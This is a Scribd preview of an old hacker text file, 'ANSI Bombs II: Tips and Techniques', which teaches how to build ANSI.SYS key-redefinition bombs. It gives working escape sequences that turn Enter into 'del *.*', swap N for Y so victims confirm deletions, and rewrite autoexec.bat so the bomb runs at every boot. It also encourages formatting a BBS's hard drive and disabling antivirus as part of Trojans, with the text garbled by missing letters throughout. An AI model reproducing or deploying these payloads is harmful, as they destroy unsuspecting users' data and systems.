Welcome to Scribd. Sign in or start your free trial to enjoy unlimited e-books, audiobooks & documents.Find out more
Download
Standard view
Full view
of .
Look up keyword
Like this
1Activity
0 of .
Results for:
No results containing your search query
P. 1
ANSIBombs II Tips and Techniques

ANSIBombs II Tips and Techniques

Ratings: (0)|Views: 1|Likes:
Published by mobilecrackers

More info:

Published by: mobilecrackers on Jul 14, 2012
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as TXT, PDF, TXT or read online from Scribd
See more
See less

07/28/2014

pdf

text

original

 
ANSI Bombs II: Tips and TechniquesByThe Raging GolemI. IntroductionAfter writing the last file, a lot of people let me
 
now about themista
 
es I had made. I guess this file is to clear up those misconceptions and to let people
 
now about some of the little tric
 
s behindANSI bombing. Of course, ANSI bombing isn't as dangerous as a lot ofpeople ma
 
e it out to be, but bombs are still fun to ma
 
e and with alittle planning deliver some degree of success. ANSI bombing canbe dangerous, so I am tired of hearing people say that an ANSI bomb isharmless, another misconception I hope to clear up. Now, most peoplethat have spent time experimenting with ANSI bombs probably
 
now mostof the material in this file, but it might be fun just to read anyway.2. MisconceptionsIn my last file, I made three major blunders, or what I would consider to be major blunders. First, I said that ANSI bombs could beused on BBSs to screw people over, but I guess I was wrong. It waspure speculation on what other people had said that made me say that.ANSI codes, including those that redefine
 
eys, are sent over thelines, but most comm programs don't use ANSI.SYS; they use their ownversion of ANSI, which doesn't support
 
ey redefinition. Some peoplemight have a program that supports it, but I haven't seen it yet. Ihave tested bombs on systems on my own and proved to myself that theydon't wor
 
. I have also seen people fuc
 
up bombs that would havewor
 
ed by uploading them in a message. The second misconception isthat ANSI bombs are dangerous when put into zips. I haven't reallytested this out much, but from what I hear with the newer versions ofPKZIP, you have to specify that you want to see ANSI comments whenunzipping. It is unli
 
ely that you would waste your time unzippingsomething again after seeing "Format C:" in the middle of an escapecode. I could be mista
 
en, but I'm pretty sure that I'm right. Third,the last thing that was a misconception is that VANSI.SYS will protectyour system from
 
ey redefinition. Maybe the newer versions don'tsupport
 
ey redefinition, but mine sure as hell does. There are programs out there that don't support it, but I don't
 
now any of thenames. Of course, if I were you, I would be wary about using something other then ANSI. I have a few friends that are wor
 
ing on "ABetter ANSI" for PDers, which, instead of being better, really screwsthem over.3. An OverviewNow, in case you haven't read my other file (it's called ANSI.DOC,
 
ind of lame but fairly informative), I'll briefly go over the structure of an ANSI bomb. S
 
ip this part if you
 
now what an ANSI bomb isand how to ma
 
e one.In ANSI everything is done with a system of escape codes. Keyredefinition is one of those codes. (From now, whenever I say ESC, Ireally mean the arrow, ). Here is a basic command:ESC [13;27pThis would ma
 
e the <Enter>
 
ey (13 is the code for enter) turninto the <Escape>
 
ey (27 is the code for escape). The always has to
 
be there, as do the brac
 
et and the "p", but what is between thebrac
 
et and the "p" is up to you. The first number is always the
 
eythat you want to be redefined. If there is a zero for the first number, that means the
 
ey is in the extended set, and therefore, thefirst two numbers are the code. The brac
 
et signifies the beginningof the definition, and the "p" signifies the end. Whenever you want a
 
ey pressed, you have to use it's numerical code (i.e. 13 is the codefor <Enter>). You can't redefine strings, but you can redefine a
 
eyto become a string (i.e. ESC [13;"Blah"p would ma
 
e <Enter> say"Blah"). Strings must be inside of quotes, which includes commandsthat you want typed on the DOS prompt (i.e. ESC [13;"Del *.*";13pwould delete everything in the directory, note that 13 stands forEnter in this case, not the redefinition). An escape code can haveas many commands as you want in it, but each one has to be separatedby a semi-colon. You can only redefine one
 
ey in each escape code,so if you want to redefine another
 
ey, you have to start anotherescape code. That's about it when it comes to bombs, now that youhave the basics, all you really need is a little imagination.4. Tips and Tric
 
sA. The Y/N RedefinitionNow, here's a simple but fun little ANSI bomb:ESC [78;89;13p ESC [110;121;13pBasically, all this does is turn a capital "N" into "Y" and alower-case "n" into "y". Alone this doesn't do too much, except forscrew around with what they are typing. On the other hand, try addingthis line of code to the ANSI bomb:ESC [13;27;13;"del *.*";13pMost people would automatically press "N" when they see "Del *.*",but when they do, they will be screwed over. This portion of a bombis very useful when it comes to ma
 
ing good bombs.B. Screwing with the Autoexec.batHere is another line of code that you may find useful in futurebombing projects:ESC [13;27;13;"copy bomb.ans c:\";13;"copy conc:\autoexec.bat";13;"type bomb.ans";13;0;109;13;"cls";13pThis line of code ma
 
es the bomb a little more permanent and alittle more dangerous. It copies the bomb into the root directory,then it change/creates the autoexec.bat, so the bomb is typed afterevery boot-up. Of course, the person could just boot off a dis
 
, butI'm sure this would get them a few time. It could also probablyappear as though it were a virus, scaring the shit out of the owner ofthe computer.C. Turning Commands into Other CommandsOne of the best pran
 
s to do to someone using an ANSI bomb is toredefine commands. That way if they type in "copy", it will turn into"Del *.*". Since you can't actually change the whole string, you have
 
to ta
 
e a different approach. You have to change a few of the
 
eys,so when typed, they type and execute the desired command. I guess itwould be coolest to have to command exactly the same length; that wayyou could redefine one
 
ey at a time to obtain the desired effect.It doesn't really matter how you do it, just as long as it wor
 
s. Youmight ma
 
e an ANSI that says "Wow, chec
 
out what this bomb did toyour directory", and then have it redefine the
 
eys, so when they typein "dir", it turns into "del". I thin
 
you get the idea.D. TrojansBy now, everybody
 
nows what a Trojan is. You probably wouldn'tthin
 
so, but ANSI bombs can be used as Trojans and in Trojans. First,if you are planning on crashing a board, but you're not very good atprogramming, then ma
 
e yourself an ANSI bomb. Try to find out inwhich directory the main files for running the BBS are stored. Theyare usually under the name BBS or the name of the software, li
 
e WWIVor Telegard. Then, ma
 
e a bomb that either just deletes all the filesin that directory, or if you want the board to be down a longer time,then ma
 
e one that formats the Hard Drive. In this form ANSI bombs,if they are well planned out, can be easy to ma
 
e Trojans. Second,ANSI bombs can used in Trojans. This is probably stretching it alittle, but say you wanted to write a Trojan that would delete adirectory, every time you typed a certain
 
ey, then you could use anANSI bomb. First ma
 
e some batch and com/exe files that would searchfor protecting programs li
 
e Norton and turn them off. Then you couldcopy the file into the root directory, along with your versions ofautoexec.bat, config.sys, ANSI.sys, and whatever else. (To ma
 
e itloo
 
more realistic ma
 
e the files Resource.00x to tric
 
the user,then when copying, use the real name). Then somehow loc
 
the computerup or do a warm boot through some pd program, which is easily attainable. When the computer loads bac
 
up, you can screw that shit out ofthem with your ANSI bomb.5. ConclusionIt would seem to some people that ANSI bombs are very dangerous,and to others that they are stupid or lame. Personally, I thin
 
thatANSI bombs are just plain old fun. They're not too hard to ma
 
e, butthere is a lot that you can do with them. They are nowhere near asmalicious as virii, so if you're loo
 
ing for unstoppable destruction,loo
 
elsewhere, but they do serve their purpose. I
 
now that thereare programs out there that help you program ANSI bombs, but I thin
 
that they
 
ind of ta
 
e the fun out of them. Probably, some day soon,I'll quit ma
 
ing ANSI bombs and start loo
 
ing more into virii and pureTrojans. But for now, ANSI bombs suit my purpose.-TRGAppendix A: Key Code ProgramHere is a small program, which I find very helpful. After loadingit up, it tells you the numeric code for every
 
ey you type in. Special means that it is in the extended set and therefore uses zero, and"q" ends the program. Unfortunately, I can't ta
 
e any credit forthis program. I got it over the phone from Heavymetl, and it was madeby his brother. So many than
 
s go out to Heavymetl and his brother,even though they'll probably be a little pissed at me for includingthis in my file. It is in Pascal and can be compiled in most TurboPascal compilers.

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->